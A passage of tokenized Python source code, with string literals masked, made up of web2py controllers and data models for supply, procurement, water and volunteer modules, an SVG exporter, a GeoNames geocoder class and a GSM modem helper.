) <EOL> return query <EOL> def tooltip ( ) : <EOL> """<STR_LIT>""" <EOL> formfield = request . vars . get ( "<STR_LIT>" , None ) <EOL> if formfield : <EOL> response . view = "<STR_LIT>" % formfield <EOL> return dict ( ) </s>
<s> """<STR_LIT>""" <EOL> module = request . controller <EOL> resourcename = request . function <EOL> if not settings . has_module ( "<STR_LIT>" ) : <EOL> raise HTTP ( <NUM_LIT> , body = "<STR_LIT>" % module ) <EOL> def index ( ) : <EOL> """<STR_LIT>""" <EOL> module_name = settings . modules [ module ] . name_nice <EOL> response . title = module_name <EOL> return dict ( module_name = module_name ) <EOL> def brand ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) <EOL> def catalog ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( rheader = s3db . supply_catalog_rheader ) <EOL> def catalog_item ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) <EOL> def distribution ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) <EOL> def distribution_report ( ) : <EOL> """<STR_LIT>""" <EOL> def prep ( r ) : <EOL> r . method = "<STR_LIT>" <EOL> return True <EOL> s3 . prep = prep <EOL> return s3_rest_controller ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def distribution_item ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) <EOL> def item ( ) : <EOL> """<STR_LIT>""" <EOL> return s3db . supply_item_controller ( ) <EOL> def item_category ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) <EOL> def item_entity ( ) : <EOL> """<STR_LIT>""" <EOL> return s3db . supply_item_entity_controller ( ) <EOL> def item_pack ( ) : <EOL> """<STR_LIT>""" <EOL> s3db . configure ( "<STR_LIT>" , <EOL> listadd = False , <EOL> ) <EOL> return s3_rest_controller ( ) <EOL> def kit_item ( ) : <EOL> """<STR_LIT>""" <EOL> return s3_rest_controller ( ) </s>
<s> import xml . dom . minidom <EOL> from urllib import urlencode <EOL> from urllib2 import urlopen <EOL> from geopy import util <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> from django . utils import simplejson as json <EOL> from geopy . geocoders . base import Geocoder <EOL> class GeoNames ( Geocoder ) : <EOL> def __init__ ( self , format_string = None , output_format = None , country_bias = None ) : <EOL> if format_string != None : <EOL> from warnings import warn <EOL> warn ( '<STR_LIT>' + <EOL> '<STR_LIT>' , DeprecationWarning ) <EOL> if output_format != None : <EOL> from warnings import warn <EOL> warn ( '<STR_LIT>' + <EOL> '<STR_LIT>' , DeprecationWarning ) <EOL> self . country_bias = country_bias <EOL> self . url = "<STR_LIT>" <EOL> def geocode ( self , string , exactly_one = True ) : <EOL> if isinstance ( string , unicode ) : <EOL> string = string . encode ( '<STR_LIT:utf-8>' ) <EOL> params = { <EOL> '<STR_LIT:q>' : string <EOL> } <EOL> if self . country_bias : <EOL> params [ '<STR_LIT>' ] = self . country_bias <EOL> url = self . url % urlencode ( params ) <EOL> return self . geocode_url ( url , exactly_one ) <EOL> def geocode_url ( self , url , exactly_one = True ) : <EOL> page = urlopen ( url ) <EOL> return self . parse_json ( page , exactly_one ) <EOL> def parse_json ( self , page , exactly_one ) : <EOL> if not isinstance ( page , basestring ) : <EOL> page = util . decode_page ( page ) <EOL> doc = json . loads ( page ) <EOL> places = doc . get ( '<STR_LIT>' , [ ] ) <EOL> if not places : <EOL> return None <EOL> if exactly_one and len ( places ) != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" "<STR_LIT>" % len ( places ) ) <EOL> def parse_code ( place ) : <EOL> latitude = place . get ( '<STR_LIT>' , None ) <EOL> longitude = place . get ( '<STR_LIT>' , None ) <EOL> if latitude and longitude : <EOL> latitude = float ( latitude ) <EOL> longitude = float ( longitude ) <EOL> else : <EOL> return None <EOL> placename = place . get ( '<STR_LIT:name>' ) <EOL> state = place . get ( '<STR_LIT>' , None ) <EOL> country = place . get ( '<STR_LIT>' , None ) <EOL> location = '<STR_LIT:U+002CU+0020>' . join ( filter ( lambda x : bool ( x ) , <EOL> [ placename , state , country ] <EOL> ) ) <EOL> return ( location , ( latitude , longitude ) ) <EOL> if exactly_one : <EOL> return parse_code ( places [ <NUM_LIT:0> ] ) <EOL> else : <EOL> return [ parse_code ( place ) for place in places ] </s>
<s> from __future__ import with_statement <EOL> import re <EOL> import datetime <EOL> import time <EOL> import errors <EOL> import threading <EOL> import gsmcodecs <EOL> from gsmmodem import GsmModem <EOL> from devicewrapper import DeviceWrapper <EOL> from pdusmshandler import PduSmsHandler <EOL> from textsmshandler import TextSmsHandler <EOL> class GsmModemNotFound ( Exception ) : <EOL> pass <EOL> class AutoGsmModem ( GsmModem ) : <EOL> """<STR_LIT>""" <EOL> cmd_delay = <NUM_LIT:0.1> <EOL> retry_delay = <NUM_LIT:2> <EOL> max_retries = <NUM_LIT:10> <EOL> modem_lock = threading . RLock ( ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> import prober <EOL> """<STR_LIT>""" <EOL> if kwargs . get ( '<STR_LIT>' , False ) : <EOL> proberargs = { '<STR_LIT>' : True } <EOL> else : <EOL> proberargs = { } <EOL> try : <EOL> del kwargs [ '<STR_LIT>' ] <EOL> except : <EOL> pass <EOL> ports = prober . probe ( ** proberargs ) <EOL> if len ( ports ) > <NUM_LIT:0> : <EOL> kwargs [ '<STR_LIT:port>' ] = ports [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> kwargs [ '<STR_LIT>' ] = ports [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> kwargs [ '<STR_LIT>' ] = "<STR_LIT:text>" <EOL> super ( AutoGsmModem , self ) . __init__ ( * args , ** kwargs ) <EOL> else : <EOL> raise GsmModemNotFound ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys <EOL> conf = dict ( [ <EOL> arg . split ( "<STR_LIT:=>" , <NUM_LIT:1> ) <EOL> for arg in sys . argv [ <NUM_LIT:2> : ] <EOL> if arg . find ( "<STR_LIT:=>" ) > - <NUM_LIT:1> <EOL> ] ) <EOL> print "<STR_LIT>" <EOL> modem = AutoGsmModem ( verbose = True ) <EOL> print "<STR_LIT>" <EOL> while True : <EOL> msg = modem . next_message ( ) <EOL> if msg is not None : <EOL> print "<STR_LIT>" % msg <EOL> msg . respond ( "<STR_LIT>" % <EOL> ( len ( msg . text ) , msg . text ) ) <EOL> else : <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> else : <EOL> print "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> __all__ = ( "<STR_LIT>" , ) <EOL> import os <EOL> try : <EOL> from cStringIO import StringIO <EOL> except : <EOL> from StringIO import StringIO <EOL> from gluon import * <EOL> from gluon . contenttype import contenttype <EOL> from gluon . storage import Storage <EOL> from gluon . streamer import DEFAULT_CHUNK_SIZE <EOL> from . . s3codec import S3Codec <EOL> from . . s3utils import s3_unicode , s3_strip_markup <EOL> class S3SVG ( S3Codec ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def extractResource ( self , resource , list_fields ) : <EOL> """<STR_LIT>""" <EOL> title = self . crud_string ( resource . tablename , "<STR_LIT>" ) <EOL> get_vars = Storage ( current . request . get_vars ) <EOL> get_vars [ "<STR_LIT>" ] = len ( list_fields ) <EOL> query , orderby , left = resource . datatable_filter ( list_fields , get_vars ) <EOL> resource . add_filter ( query ) <EOL> data = resource . select ( list_fields , <EOL> left = left , <EOL> limit = None , <EOL> orderby = orderby , <EOL> represent = True , <EOL> show_links = False ) <EOL> rfields = data [ "<STR_LIT>" ] <EOL> types = [ ] <EOL> colnames = [ ] <EOL> heading = { } <EOL> for rfield in rfields : <EOL> if rfield . show : <EOL> colnames . append ( rfield . colname ) <EOL> heading [ rfield . colname ] = rfield . label <EOL> if rfield . virtual : <EOL> types . append ( "<STR_LIT:string>" ) <EOL> else : <EOL> types . append ( rfield . ftype ) <EOL> items = data [ "<STR_LIT>" ] <EOL> return ( title , types , colnames , heading , items ) <EOL> def encode ( self , resource , ** attr ) : <EOL> """<STR_LIT>""" <EOL> if resource . prefix == "<STR_LIT>" and resource . name == "<STR_LIT:location>" : <EOL> list_fields = [ "<STR_LIT>" ] <EOL> else : <EOL> list_fields = [ "<STR_LIT>" ] <EOL> current . s3db . gis_location . wkt . represent = None <EOL> ( _title , types , lfields , headers , items ) = self . extractResource ( resource , <EOL> list_fields ) <EOL> wkt = items [ <NUM_LIT:0> ] [ "<STR_LIT>" ] <EOL> if not wkt : <EOL> current . log . error ( "<STR_LIT>" ) <EOL> title = attr . get ( "<STR_LIT:title>" , resource . _ids [ <NUM_LIT:0> ] ) <EOL> filename = "<STR_LIT>" % title <EOL> filepath = self . write_file ( filename , wkt , ** attr ) <EOL> disposition = "<STR_LIT>" % filename <EOL> response = current . response <EOL> response . headers [ "<STR_LIT:Content-Type>" ] = contenttype ( "<STR_LIT>" ) <EOL> response . headers [ "<STR_LIT>" ] = disposition <EOL> stream = open ( filepath ) <EOL> return response . stream ( stream , chunk_size = DEFAULT_CHUNK_SIZE , <EOL> request = current . request ) <EOL> @ staticmethod <EOL> def write_file ( filename , wkt , ** attr ) : <EOL> from xml . etree import ElementTree as et <EOL> iheight = <NUM_LIT> <EOL> height = str ( iheight ) <EOL> iwidth = <NUM_LIT> <EOL> width = str ( iwidth ) <EOL> doc = et . Element ( "<STR_LIT>" , width = width , height = height , version = "<STR_LIT>" , xmlns = "<STR_LIT>" ) <EOL> from shapely . wkt import loads as wkt_loads <EOL> try : <EOL> from shapely import speedups <EOL> speedups . enable ( ) <EOL> except : <EOL> current . log . info ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> shape = wkt_loads ( wkt ) <EOL> geom_type = shape . geom_type <EOL> if geom_type not in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> current . log . error ( "<STR_LIT>" , geom_type ) <EOL> return <EOL> from shapely import affinity <EOL> bounds = shape . bounds <EOL> swidth = abs ( bounds [ <NUM_LIT:2> ] - bounds [ <NUM_LIT:0> ] ) <EOL> sheight = abs ( bounds [ <NUM_LIT:3> ] - bounds [ <NUM_LIT:1> ] ) <EOL> width_multiplier = iwidth / swidth <EOL> height_multiplier = iheight / sheight <EOL> multiplier = min ( width_multiplier , height_multiplier ) * <NUM_LIT> <EOL> shape = affinity . scale ( shape , xfact = multiplier , yfact = - multiplier , origin = "<STR_LIT>" ) <EOL> centroid = shape . centroid <EOL> xoff = ( iwidth / <NUM_LIT:2> ) - centroid . x <EOL> yoff = ( iheight / <NUM_LIT:2> ) - centroid . y <EOL> shape = affinity . translate ( shape , xoff = xoff , yoff = yoff ) <EOL> if geom_type == "<STR_LIT>" : <EOL> polygons = shape . geoms <EOL> elif geom_type == "<STR_LIT>" : <EOL> polygons = [ shape ] <EOL> points = [ ] <EOL> pappend = points . append <EOL> for polygon in polygons : <EOL> _points = polygon . exterior . coords <EOL> for point in _points : <EOL> pappend ( "<STR_LIT>" % ( point [ <NUM_LIT:0> ] , point [ <NUM_LIT:1> ] ) ) <EOL> points = "<STR_LIT:U+0020>" . join ( points ) <EOL> fill = "<STR_LIT>" <EOL> stroke = "<STR_LIT>" <EOL> et . SubElement ( doc , "<STR_LIT>" , width = width , height = height , fill = fill , stroke = stroke ) <EOL> fill = "<STR_LIT>" <EOL> stroke = "<STR_LIT>" <EOL> et . SubElement ( doc , "<STR_LIT>" , points = points , fill = fill , stroke = stroke ) <EOL> path = os . path . join ( current . request . folder , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if not os . path . exists ( path ) : <EOL> os . makedirs ( path ) <EOL> filepath = os . path . join ( path , filename ) <EOL> with open ( filepath , "<STR_LIT:w>" ) as f : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( et . tostring ( doc ) ) <EOL> return filepath <EOL> def decode ( self , resource , source , ** attr ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> return root </s>
<s> """<STR_LIT>""" <EOL> __all__ = ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) <EOL> from gluon import * <EOL> from gluon . storage import Storage <EOL> from . . s3 import * <EOL> class S3ProcurementModel ( S3Model ) : <EOL> """<STR_LIT>""" <EOL> names = ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) <EOL> def model ( self ) : <EOL> T = current . T <EOL> db = current . db <EOL> auth = current . auth <EOL> crud_strings = current . response . s3 . crud_strings <EOL> define_table = self . define_table <EOL> messages = current . messages <EOL> configure = self . configure <EOL> proc_shipping_opts = { <NUM_LIT:0> : messages [ "<STR_LIT>" ] , <EOL> <NUM_LIT:1> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:2> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:3> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:4> : T ( "<STR_LIT>" ) <EOL> } <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> self . super_link ( "<STR_LIT>" , "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> default = auth . user . site_id if auth . is_logged_in ( ) else None , <EOL> readable = True , <EOL> writable = True , <EOL> empty = False , <EOL> represent = self . org_site_represent ) , <EOL> s3_date ( "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) <EOL> ) , <EOL> s3_date ( "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> self . org_organisation_id ( label = T ( "<STR_LIT>" ) ) , <EOL> Field ( "<STR_LIT>" , "<STR_LIT>" , <EOL> requires = IS_EMPTY_OR ( IS_IN_SET ( proc_shipping_opts ) ) , <EOL> represent = lambda opt : proc_shipping_opts . get ( opt , <EOL> messages . UNKNOWN_OPT ) , <EOL> label = T ( "<STR_LIT>" ) , <EOL> default = <NUM_LIT:0> , <EOL> ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = T ( "<STR_LIT>" ) , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> label_delete_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) ) <EOL> plan_item_url = URL ( f = "<STR_LIT>" , args = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> configure ( tablename , <EOL> create_next = plan_item_url , <EOL> update_next = plan_item_url ) <EOL> plan_id = S3ReusableField ( "<STR_LIT>" , "<STR_LIT>" % tablename , <EOL> sortby = "<STR_LIT:date>" , <EOL> requires = IS_EMPTY_OR ( <EOL> IS_ONE_OF ( db , "<STR_LIT>" , <EOL> self . proc_plan_represent , <EOL> orderby = "<STR_LIT>" , <EOL> sort = True ) ) , <EOL> represent = self . proc_plan_represent , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ondelete = "<STR_LIT>" ) <EOL> self . add_components ( tablename , <EOL> proc_plan_item = "<STR_LIT>" , <EOL> ) <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> plan_id ( ) , <EOL> self . supply_item_entity_id , <EOL> self . supply_item_id ( ) , <EOL> self . supply_item_pack_id ( ) , <EOL> Field ( "<STR_LIT>" , "<STR_LIT>" , notnull = True , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> s3_currency ( readable = False , <EOL> writable = False <EOL> ) , <EOL> Field ( "<STR_LIT>" , "<STR_LIT>" , <EOL> readable = False , <EOL> writable = False , <EOL> label = T ( "<STR_LIT>" ) ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = T ( "<STR_LIT>" ) , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> label_delete_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) ) <EOL> filter_widgets = [ <EOL> S3TextFilter ( [ "<STR_LIT>" , <EOL> ] , <EOL> label = T ( "<STR_LIT>" ) , <EOL> comment = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> S3OptionsFilter ( "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> comment = T ( "<STR_LIT>" ) , <EOL> cols = <NUM_LIT:2> , <EOL> hidden = True , <EOL> ) , <EOL> ] <EOL> configure ( tablename , <EOL> super_entity = "<STR_LIT>" , <EOL> filter_widgets = filter_widgets , <EOL> report_hide_comments = True ) <EOL> return { } <EOL> @ staticmethod <EOL> def proc_plan_represent ( id , row = None ) : <EOL> """<STR_LIT>""" <EOL> if row : <EOL> table = current . db . proc_plan <EOL> elif not id : <EOL> return current . messages [ "<STR_LIT>" ] <EOL> else : <EOL> db = current . db <EOL> table = db . proc_plan <EOL> row = db ( table . id == id ) . select ( table . site_id , <EOL> table . order_date , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> try : <EOL> return "<STR_LIT>" % ( table . site_id . represent ( row . site_id ) , <EOL> table . order_date . represent ( row . order_date ) ) <EOL> except : <EOL> return current . messages . UNKNOWN_OPT <EOL> def proc_rheader ( r ) : <EOL> """<STR_LIT>""" <EOL> if r . representation == "<STR_LIT:html>" : <EOL> plan = r . record <EOL> if plan : <EOL> T = current . T <EOL> tabs = [ <EOL> ( T ( "<STR_LIT>" ) , None ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ] <EOL> rheader_tabs = s3_rheader_tabs ( r , tabs ) <EOL> table = r . table <EOL> rheader = DIV ( TABLE ( TR ( TH ( "<STR_LIT>" % table . site_id . label ) , <EOL> table . site_id . represent ( plan . site_id ) , <EOL> ) , <EOL> TR ( TH ( "<STR_LIT>" % table . order_date . label ) , <EOL> table . order_date . represent ( plan . order_date ) , <EOL> ) , <EOL> TR ( TH ( "<STR_LIT>" % table . eta . label ) , <EOL> table . eta . represent ( plan . eta ) , <EOL> ) , <EOL> TR ( TH ( "<STR_LIT>" % table . shipping . label ) , <EOL> table . shipping . represent ( plan . shipping ) , <EOL> ) , <EOL> ) , <EOL> rheader_tabs <EOL> ) <EOL> return rheader <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> __all__ = ( "<STR_LIT>" , ) <EOL> from gluon import * <EOL> from gluon . storage import Storage <EOL> from . . s3 import * <EOL> from s3layouts import S3PopupLink <EOL> class S3WaterModel ( S3Model ) : <EOL> """<STR_LIT>""" <EOL> names = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> def model ( self ) : <EOL> T = current . T <EOL> db = current . db <EOL> crud_strings = current . response . s3 . crud_strings <EOL> define_table = self . define_table <EOL> location_id = self . gis_location_id <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> Field ( "<STR_LIT:name>" , <EOL> label = T ( "<STR_LIT:Name>" ) , <EOL> ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> ADD_ZONE_TYPE = T ( "<STR_LIT>" ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = ADD_ZONE_TYPE , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> title_upload = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> label_delete_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) ) <EOL> zone_type_represent = S3Represent ( lookup = tablename ) <EOL> self . configure ( tablename , <EOL> deduplicate = S3Duplicate ( ) , <EOL> ) <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> Field ( "<STR_LIT:name>" , <EOL> label = T ( "<STR_LIT:Name>" ) , <EOL> ) , <EOL> Field ( "<STR_LIT>" , db . water_zone_type , <EOL> label = T ( "<STR_LIT>" ) , <EOL> represent = zone_type_represent , <EOL> requires = IS_EMPTY_OR ( <EOL> IS_ONE_OF ( db , "<STR_LIT>" , <EOL> zone_type_represent , <EOL> sort = True ) ) , <EOL> comment = S3PopupLink ( c = "<STR_LIT>" , <EOL> f = "<STR_LIT>" , <EOL> label = ADD_ZONE_TYPE , <EOL> tooltip = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> ) , <EOL> location_id ( <EOL> widget = S3LocationSelector ( catalog_layers = True , <EOL> points = False , <EOL> polygons = True , <EOL> ) , <EOL> ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = T ( "<STR_LIT>" ) , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> title_upload = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> label_delete_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) ) <EOL> zone_represent = S3Represent ( lookup = tablename ) <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> Field ( "<STR_LIT:name>" , <EOL> label = T ( "<STR_LIT:Name>" ) , <EOL> requires = IS_NOT_EMPTY ( ) , <EOL> ) , <EOL> location_id ( <EOL> widget = S3LocationSelector ( catalog_layers = True , <EOL> points = False , <EOL> polygons = True , <EOL> ) <EOL> ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> ADD_RIVER = T ( "<STR_LIT>" ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = ADD_RIVER , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) ) <EOL> flowstatus_opts = { <NUM_LIT:1> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:2> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:3> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:4> : T ( "<STR_LIT>" ) <EOL> } <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> Field ( "<STR_LIT:name>" , <EOL> label = T ( "<STR_LIT:Name>" ) , <EOL> ) , <EOL> Field ( "<STR_LIT:code>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> location_id ( ) , <EOL> Field ( "<STR_LIT:url>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> represent = lambda url : A ( url , _href = url , _target = "<STR_LIT:blank>" ) , <EOL> requires = IS_EMPTY_OR ( IS_URL ( ) ) , <EOL> ) , <EOL> Field ( "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> Field ( "<STR_LIT>" , "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> Field ( "<STR_LIT:status>" , "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> represent = lambda opt : flowstatus_opts . get ( opt , opt ) , <EOL> requires = IS_EMPTY_OR ( IS_IN_SET ( flowstatus_opts ) ) , <EOL> ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = T ( "<STR_LIT>" ) , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> title_map = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) ) <EOL> return { } </s>
<s> from gluon import current <EOL> from s3 import * <EOL> from s3layouts import * <EOL> try : <EOL> from . layouts import * <EOL> except ImportError : <EOL> pass <EOL> import s3menus as default <EOL> class S3OptionsMenu ( default . S3OptionsMenu ) : <EOL> """<STR_LIT>""" <EOL> def vol ( self ) : <EOL> """<STR_LIT>""" <EOL> s3 = current . session . s3 <EOL> ADMIN = s3 . system_roles . ADMIN <EOL> manager_mode = lambda i : s3 . hrm . mode is None <EOL> personal_mode = lambda i : s3 . hrm . mode is not None <EOL> is_org_admin = lambda i : s3 . hrm . orgs and True or ADMIN in s3 . roles <EOL> settings = current . deployment_settings <EOL> teams = settings . get_hrm_teams ( ) <EOL> use_teams = lambda i : teams <EOL> return M ( c = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = { "<STR_LIT>" : "<STR_LIT>" } , p = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( teams , f = "<STR_LIT>" , <EOL> check = [ manager_mode , use_teams ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:index>" , <EOL> check = [ personal_mode , is_org_admin ] ) , <EOL> ) </s>
<s> from gluon import * <EOL> from s3 import S3CustomController <EOL> TEMPLATE = "<STR_LIT>" <EOL> class index ( S3CustomController ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self ) : <EOL> output = { } <EOL> T = current . T <EOL> s3 = current . response . s3 <EOL> auth = current . auth <EOL> settings = current . deployment_settings <EOL> roles = current . session . s3 . roles <EOL> system_roles = auth . get_system_roles ( ) <EOL> if settings . has_module ( "<STR_LIT>" ) : <EOL> ADMIN = system_roles . ADMIN in roles <EOL> s3db = current . s3db <EOL> table = s3db . cms_post <EOL> ltable = s3db . cms_post_module <EOL> module = "<STR_LIT:default>" <EOL> resource = "<STR_LIT:index>" <EOL> query = ( ltable . module == module ) & ( ( ltable . resource == None ) | ( ltable . resource == resource ) ) & ( ltable . post_id == table . id ) & ( table . deleted != True ) <EOL> item = current . db ( query ) . select ( table . id , <EOL> table . body , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> if item : <EOL> if ADMIN : <EOL> item = DIV ( XML ( item . body ) , <EOL> BR ( ) , <EOL> A ( current . T ( "<STR_LIT>" ) , <EOL> _href = URL ( c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> args = [ item . id , "<STR_LIT>" ] ) , <EOL> _class = "<STR_LIT>" ) ) <EOL> else : <EOL> item = DIV ( XML ( item . body ) ) <EOL> elif ADMIN : <EOL> if s3 . crud . formstyle == "<STR_LIT>" : <EOL> _class = "<STR_LIT>" <EOL> else : <EOL> _class = "<STR_LIT>" <EOL> item = A ( T ( "<STR_LIT>" ) , <EOL> _href = URL ( c = "<STR_LIT>" , f = "<STR_LIT>" , args = "<STR_LIT>" , <EOL> vars = { "<STR_LIT>" : module , <EOL> "<STR_LIT>" : resource <EOL> } ) , <EOL> _class = "<STR_LIT>" % _class ) <EOL> else : <EOL> item = "<STR_LIT>" <EOL> else : <EOL> item 